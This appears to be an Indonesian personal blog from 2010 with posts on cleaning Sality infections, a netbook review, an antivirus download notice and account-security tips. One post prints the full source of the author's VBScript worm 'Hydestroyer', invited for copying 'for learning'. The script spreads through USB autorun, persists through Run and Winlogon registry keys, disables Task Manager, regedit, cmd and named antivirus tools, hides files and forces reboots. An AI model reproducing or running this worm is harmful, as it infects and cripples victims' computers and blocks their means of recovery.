Rabu, 26 Mei 2010

Mengamankan Data Program di Hardisk dari Virus Sality.M Variant

Teman-teman pasti sudah pada kenal dengan Virus yang cukup merepotkan ini.
Sality memiliki banyak variant yang dikodekan/dibedakan dengan huruf. Virus-virus ini menyerang file berformat aplikasi/.exe baik itu di C, D, E ataupun di media flash disk. Beberapa anti virus sudah mengenali beberapa variant sality dan dapat memperbaiki file yang terkena virus ini.
Khusus Sality M.Variant, saya belum menemukan anti virus yang dapat menghentikan aksi dari virus ini. Kebanyakan dari anti virus tersebut baru bisa mendeteksi keberadaan Sality. M Variant
Jika sudah terlanjur terkena virus ini, solusi yang dapat saya berikan adalah menginstal ulang OS anda.
Eiiittss,, sebelumnya hati-hati dulu dengan Data Program Backupan anda, bisa-bisa OS yang baru saja diinstal tersebut bervirus lagi gara-gara anda menginstal dari backup-an (cuapeeek deh musti instal OS lagi...).
Sebaiknya anda cek dulu dengan PCMAV 3.0.2 + Clamav. Kalo belum punya silakan liat disini

Jika kompie anda sudah bersih dari Sality.M Variant, saya sarankan untuk segera membackup data program mentah anda dengan Nero Image..
Bagi yang belum tau caranya
1. Instal Nero (versi terserah anda)
2. Jika proses Instalasi selesai, jalankan program nero
3. Pilih Option Make Data CD/DVD
4. Add file/program yang akan anda backup>> Klik Finish >> Next
5. Pada Current Folder pilih Image Recorder
6. Klik Burn
7. Selanjutnya pilih tempat dimana anda ingin menyimpan file image (file akan tersimpan dalam bentuk .nrg atau .iso >> selesai

Untuk membuka file tersebut bisa menggunakan program-program CD ImageDrive seperti Alkohol, CD Image, Virtual Drive, dll.
Atau aktifkan saja image drive yang sudah terinstalasi di Nero
1. Start>All Program>Nero>Nero Image Drive
2. Aktifkan CD image, lalu Browse dimana anda menyimpan file image
3. Load
4. Buka explorer untuk melihat file program anda.

My Gadget

My gadget...
Ngage QD dan HP Mini 210-1014.

Meski jadul, ni QD always setia menemani, dari dengerin musik, NgeGame ampe Internetan.
Kalo gak sempet ke warnet dan musti ngirim file, ni hape jadi andalan... dengan bantuan aplikasi ProfiMail 2.7 file pun dengan mudah terkirim..

Pas pengen hotspot-an cukup bawa HP Mini yang dibungkus tas kecil yang gak bakal mberatin punggung... nyalain trus hotspot-an deh,,, Untuk Operating System, saya memakai Dual OS >> Win XP SP 2 "Ori" dan Ubuntu 10.04 LTS
Kemampuan HP mini ini juga gak ngecewakan, meski kecil ni netbook bisa memberikan kepuasan si pemakai... untuk bermain game 3D lancar-lancar aja..

Game 3D yang pernah saya mainkan di Netbook HP Mini 210 >> PB Online, CS NoSTream Online + MultiPlay, Need For Speed 2, Warcraft/DoTA MultiPlayer, Gun Bound OnLine, Pes2006, Game House, PopCaps, dan Emulator (Nintendo, Sega, GameBoy, Nintendo 64)
Semua berjalan dengan baik.

HP Mini 210 ini juga saya Cekoki dengan program Autocad 2008, Photoshop CS3, Corel DrawX4, Office 2008, Etabs 8, PDVD 8, Nero 6, Athan, Winamp, dan SpiderPlayer tentunya.

Untuk Internetan saya gunain Browser FireFox 3.6.3, Google Chrome dan Opera 10.53 dengan Flash Player 10.
Aplikasi chating saya instalkan Nimbuzz, Google Talk, dan YM,
Untuk menjelajah saya pake program Google Earth Upd 2009

Beberapa kelebihan dan kekurangan HP Mini 210

Kelebihannya :
1. Kecil, Ringan dan tipis, sehingga mudah untuk dibawa dan tidak memakan ruang tas
2. Keyboardnya nyaman digunakan sehingga tidak mengurangi kecepatan mengetik
3. Layar yang Tajam dan ternyata Antigores
4. Modelnya gak malu2in
5. Dari segi harga terbilang murah dengan spek yang lumayan seperti ini

Kekurangannya :
1. Layar yang kecil (yah namanya juga mini, berarti semua serba mini donk,,, gak terlalu bermasalah sebenarnya)
2. Bluetooth gak ada (hanya diseri 210 tertentu yg ada bluetooh), tapi bisa diakali dengan membeli bluetooth seharga Rp. 15.000 - 30.000.
3. Touchpad terlalu sensitif
4. Speaker agak cempreng
5. Tidak adanya CD room (yuupp, sekali lagi,, mini..)
6. Netbook ini cukup panas. Anda rasakan pada bagian bawah dan samping, akan terasa hawa yang panas. (cek pake speccy : suhu normal preccie 46 derajat, saat bermain game bisa mencapai 69 derajat). Biar tetep awet, saya selalu menggunakan Kipas sebagai pendinginnya..

Belajar Membuat Virus VBS dari "Virus Hydestroyer.VBS"

"Tulisan ini hanya bermaksud untuk pembelajaran,
Saya tidak bertanggung
jawab atas segala penyalahgunaan dari script ini"

Virus yang saya buat ini (thn 2007an) bermula dari sebuah File Visual Basic Script yang saya temukan didalam flashdisk seorang teman.
Setelah saya pelajari, script pendek tersebut bermaksud untuk mengubah tulisan di program Internet Explorer.. Kalo gak salah begini tulisannya >> dajjal...... (saya lupa tulisan selanjutnya).
Lalu dengan bermodal regedit dan pengetahuan di vbs, saya mengubah script tersebut. Selanjutnya dengan sedikit trik dan utak atik, script file tersebut dapat bekerja sama dengan DOS file. Finally, Virus Hydestroyer dapat bekerja di sistem XP Normal maupun Safe Mode.

Inilah Script jadi dari VIRUS HYDESTROYER

'& & & & &&& &&&&&& &&&& &&&&&&& &&& &&& & & &&&&&& &&&
'& & & & & & & & & & & & & & & & & &
'& & & & & & & & & & & & & & & & & &
'&&&&&& & & & &&&& &&&& & & & & & & &&&& & &
'& & & & & & & & &&& & & & & &&&
'& & & & & & & & & & & & & & & &
'& & & &&& &&&&&& &&&&& & & & &&& & &&&&&& & &
on error resume next
Rem My name is hydestroyer
Dim src, winpath, micpath, runpath, flashdrive, onkan, jalan, ext, txt, jpg, fs, mf, atr, tulis, task, gpedit, tf, rg, nt, batText, check, sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe desktop.ini.vbs"&vbcrlf&"____________________"&vbcrlf&"by hydestroyer"
txt = "Passing by...Passing by... Real World..."&vbcrlf&"running through without your Love"&vbcrlf&"running through without your Love"&vbcrlf&"running with >>> hydestroyer"
Desk = "[ExtShellFolderViews]"&vbcrlf&"{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}"&vbcrlf&"[{BE098140-A513-11D0-A3A4-00C04FD706EC}]"&vbcrlf&"Attributes=1"&vbcrlf&"IconArea_Image=.*.jpg"&vbcrlf&"IconArea_Text=0x00FFFFFF"&vbcrlf&"IconArea_TextBackground=0x00FF0665"&vbcrlf&"[.ShellClassInfo]"&vbcrlf&"ConfirmFileOp=0"
Set fs = CreateObject("Scripting.FileSystemObject"): Set mf = fs.getfile(Wscript.ScriptFullname): Dim text, size: size = mf.size: check = mf.drive.drivetype: Set text = mf.openastextstream(1, -2)
Do While Not text.atendofstream: src=src&text.readline: src = src & vbCrLf: Loop
Do: Set winpath = fs.getspecialfolder(0)
Set tf = fs.getfile(winpath & "\NTUser.DAT.vbs"): tf.Attributes = 32: Set tf = fs.createtextfile(winpath & "\NTUser.DAT.vbs", 2, True): tf.write src: tf.Close: Set tf = fs.getfile(winpath & "\NTUser.DAT.vbs"): tf.Attributes = 39
Set micpath = fs.getspecialfolder(0): Set tf = fs.getfile(micpath & "\Microsoft.NET\Tech.DAT.vbs"): tf.Attributes = 32: Set tf = fs.createtextfile(micpath & "\Microsoft.NET\Tech.DAT.vbs", 2, True): tf.write src: tf.Close: Set tf = fs.getfile(micpath & "\Microsoft.NET\Tech.DAT.vbs"): tf.Attributes = 39
Set runpath = fs.getspecialfolder(0): Set tf = fs.getfile(runpath & "\system32\driverconfig.vbs"): tf.Attributes = 32: Set tf = fs.createtextfile(runpath & "\system32\driverconfig.vbs", 2, True): tf.write src: tf.Close: Set tf = fs.getfile(runpath & "\system32\driverconfig.vbs"): tf.Attributes = 39
Set batpath = fs.getspecialfolder(0): Set tf = fs.getfile(batpath & "\driverconfig.vbs"): Set tf = fs.createtextfile(batpath & "\driverconfig.vbs", 2, True): tf.write src: tf.Close: Set tf = fs.getfile(batpath & "\driverconfig.vbs")
Set tf = fs.getfile(winpath & "\ketikkan.doc"): Set tf = fs.createtextfile(winpath & "\ketikkan.doc", 2, True): tf.write txt: tf.Close: Set tf = fs.getfile(winpath & "\ketikkan.doc")
For Each flashdrive In fs.drives
If (flashdrive.drivetype = 1) Then
Set tf = fs.getfile(flashdrive.Path & "\desktop.ini.vbs"): tf.Attributes = 32: Set tf = fs.createtextfile(flashdrive.Path & "\desktop.ini.vbs", 2, True): tf.write src: tf.Close: Set tf = fs.getfile(flashdrive.Path & "\desktop.ini.vbs"): tf.Attributes = 39
Set tf = fs.getfile(flashdrive.Path & "\autorun.inf"): tf.Attributes = 32: Set tf = fs.createtextfile(flashdrive.Path & "\autorun.inf", 2, True): tf.write atr: tf.Close: Set tf = fs.getfile(flashdrive.Path & "\autorun.inf"): tf.Attributes = 39
Set tf = fs.getfile(flashdrive.Path & "\data.doc"): Set tf = fs.createtextfile(flashdrive.Path & "\data.doc", 2, True): tf.write txt: tf.Close: Set tf = fs.getfile(flashdrive.Path & "\data.doc")
Set tf = fs.getfile(flashdrive.Path & "\desktop.ini"): tf.Attributes = 32: Set tf = fs.createtextfile(flashdrive.Path & "\desktop.ini", 2, True): tf.write desk: tf.Close: Set tf = fs.getfile(flashdrive.Path & "\desktop.ini"): tf.Attributes = 39
End If
on error resume next
If fs.FileExists(winpath & "\NTUser.DAT.vbs") = false Then
Set onkan = Wscript.CreateObject("Wscript.Shell")
onkan.run(winpath & "\system32\logoff.exe")
End If
on error resume next
If fs.FileExists(runpath & "\system32\driverconfig.vbs") = false Then
Set onkan = Wscript.CreateObject("Wscript.Shell")
onkan.run(winpath & "\system32\logoff.exe")
End If
on error resume next
If fs.FileExists(micpath & "\Microsoft.NET\Tech.DAT.vbs") = false Then
Set onkan = Wscript.CreateObject("Wscript.Shell")
onkan.run(winpath & "\system32\logoff.exe")
End If
on error resume next
If fs.FileExists(winpath & "\ulangi.bat") = false Then
Set tulis = fs.CreateTextFile(winpath & "\ulangi.bat", True)
tulis.WriteLine("@echo off")
tulis.WriteLine("C:\Windows\System32\shutdown.exe -r -t 31")
Set batText = fs.getfile(winpath & "\ulangi.bat", True)
End If
Set rg = CreateObject("WScript.Shell")
rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD",0,"REG_DWORD"
rg.regwrite "HKEY_CLASSES_ROOT\VBSFile\FriendlyTypeName", "hydestroyer"
rg.regwrite "HKCR\vbsfile\DefaultIcon\", "%SystemRoot%\system32\SHELL32.dll,49"
rg.regwrite "HKEY_CLASSES_ROOT\Word.Document.8\", "hydestroyer files"
rg.regwrite "HKEY_CLASSES_ROOT\Word.Document.8\DefaultIcon\", "C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\xlicons.exe,1"
rg.regwrite "HKEY_CLASSES_ROOT\Excel.Sheet.8\", "hydestroyer files"
rg.regwrite "HKEY_CLASSES_ROOT\Excel.Sheet.8\DefaultIcon\", "C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\wordicon.exe,1"
rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1", "AVG.exe": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2", "cmd.exe": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3", "kav8.exe": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4", "Notepad.exe": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5", "PCMAV-CLN.exe": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6", "RamCleaner.exe": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7", "RegCleaner.exe": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",145,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoShellSearchButton",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",2,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallPaper",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu",1,"REG_DWORD"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\C-Media Wave",winpath & "\NTUser.DAT.vbs": rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSOffice",micpath & "\Microsoft.NET\Tech.DAT.vbs": rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winamp Wave",runpath & "\system32\driverconfig.vbs": rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\WinLogon\Shell", "Explorer.exe hydeless.bat"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "...hydestroyer...": rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Default_Page_URL", ".*."

on error resume next
If fs.FileExists(winpath & "\hydestroyer.exe") = false Then
Set tulis = fs.CreateTextFile(winpath & "\converter.bat", True)
tulis.WriteLine("@echo *==================================")
tulis.WriteLine("@echo Welcome to hydestroyer homenet.hack")
tulis.WriteLine("@echo *==================================")
tulis.WriteLine("@echo off")
tulis.WriteLine("copy c:\windows\system32\wscript.exe c:\windows\wscript.exe")
tulis.WriteLine("ren c:\windows\wscript.exe hydestroyer.exe")
tulis.WriteLine("copy c:\windows\system32\wscript.exe c:\windows\wscript.exe")
tulis.WriteLine("ren c:\windows\wscript.exe svchost.exe")
tulis.WriteLine("c:\windows\hydestroyer.exe c:\windows\driverconfig.vbs")
tulis.WriteLine("c:\windows\svchost.exe c:\windows\driverconfig.vbs")
Set batText = fs.getfile(winpath & "\converter.bat", True)
End If

on error resume next
If fs.FileExists(winpath & "\hydestroyer.exe") = false Then
Set jalan = Wscript.CreateObject("Wscript.Shell")
jalan.run(winpath & "\converter.bat")
End If

on error resume next
If fs.FileExists(winpath & "\hydeless.bat") = false Then
Set onkan = Wscript.CreateObject("Wscript.Shell")
onkan.run(winpath & "\ulangi.bat")
End If

on error resume next
If fs.FileExists(winpath & "\hydeless.bat") = false Then
Set tulis = fs.CreateTextFile(winpath & "\hydeless.bat", True)
tulis.WriteLine("@echo *==================================")
tulis.WriteLine("@echo Welcome to hydestroyer homenet.hack")
tulis.WriteLine("@echo *==================================")
tulis.WriteLine("@echo off")
tulis.WriteLine("c:\windows\hydestroyer.exe c:\windows\driverconfig.vbs")
tulis.WriteLine("c:\windows\svchost.exe c:\windows\driverconfig.vbs")
Set batText = fs.getfile(winpath & "\hydeless.bat", True)
End If

If check <> 1 Then Wscript.sleep 0
Loop While check <> 1: Set sd = CreateObject("Wscript.shell"): sd.run winpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname

Silakan Di Copy untuk dipelajari,
Saya akan sangat berterima kasih akan komentar anda, baik itu kritikan dan masukkan.

"Tulisan ini hanya bermaksud untuk pembelajaran,
Saya tidak bertanggung
jawab atas segala penyalahgunaan dari script ini"

Selasa, 25 Mei 2010

PC MAV 3.0.2 Upd 2

Anti virus ini terkenal ampuh untuk menanggulangi dan memperbaiki file yang terinfeksi virus-virus lokal tanpa menghapus file tersebut.

Anti Virus : PCMAV 3.0.2
Engine Version : 3435 + 54
Dapat mendeteksi virus lokal sebanyak 3.246 + 54 Virus Lokal
Untuk mendownload-nya klik disini

Virus-virus baru yang dapat diatasi diantaranya :

Daftar selengkapnya bisa dilihat di file "readme" dalam folder PCMAV

Tips mengamankan E-mail dan Akun

"Aduuhh,, akun FB saya kena Hack"
"Koq profil dan status saya berubah gini sih!!"

Seringkali kita mendengar keluhan seperti ini dari beberapa teman yg email dan akunnya di akses oleh orang lain.
Sering orang menyalahartikan istilah hack dan crack.
Hacking bertujuan untuk mencari kelemahan suatu sistem komputer yang kemudian untuk selanjutnya diperbaiki
sedangkan cracking bertujuan untuk menerobos suatu sistem komputer dan memanfaatkan kelemahan tersebut.
Untuk jelasnya bisa di search di om google,, hehhehhehehhee ^^

Yupzz,, Back to point...
Ada beberapa tips yang bisa dilakukan agar akun kita tetap aman..
1. Jangan pernah menunjukan/memperlihatkan alamat e-mail anda kepada orang yang tidak
anda kenal
2. Buatlah Password dengan kombinasi huruf, angka, atau karakter lainnya, semakin panjang
password akan semakin aman akun tersebut.
(nb : usahakan jangan menggunakan kombinasi tgl, bulan, dan tahun lahir anda)
3. Setiap akun biasanya memiliki pertanyaan keamanan,
naah untuk yang satu ini, anda buat sendiri pertanyaan dan jawaban yang tidak umum.
(perhatikan, jangan sampai ada pertanyaan yang ada sangkut pautnya dengan profil anda)
4. Jika terlanjur di hack, segera ganti password dan pertanyaan keamanan anda kemudian
periksa alamat email alternatif.

Jika ada tambahan bisa di share di sini..

Domo Arigatoo Gozaimasu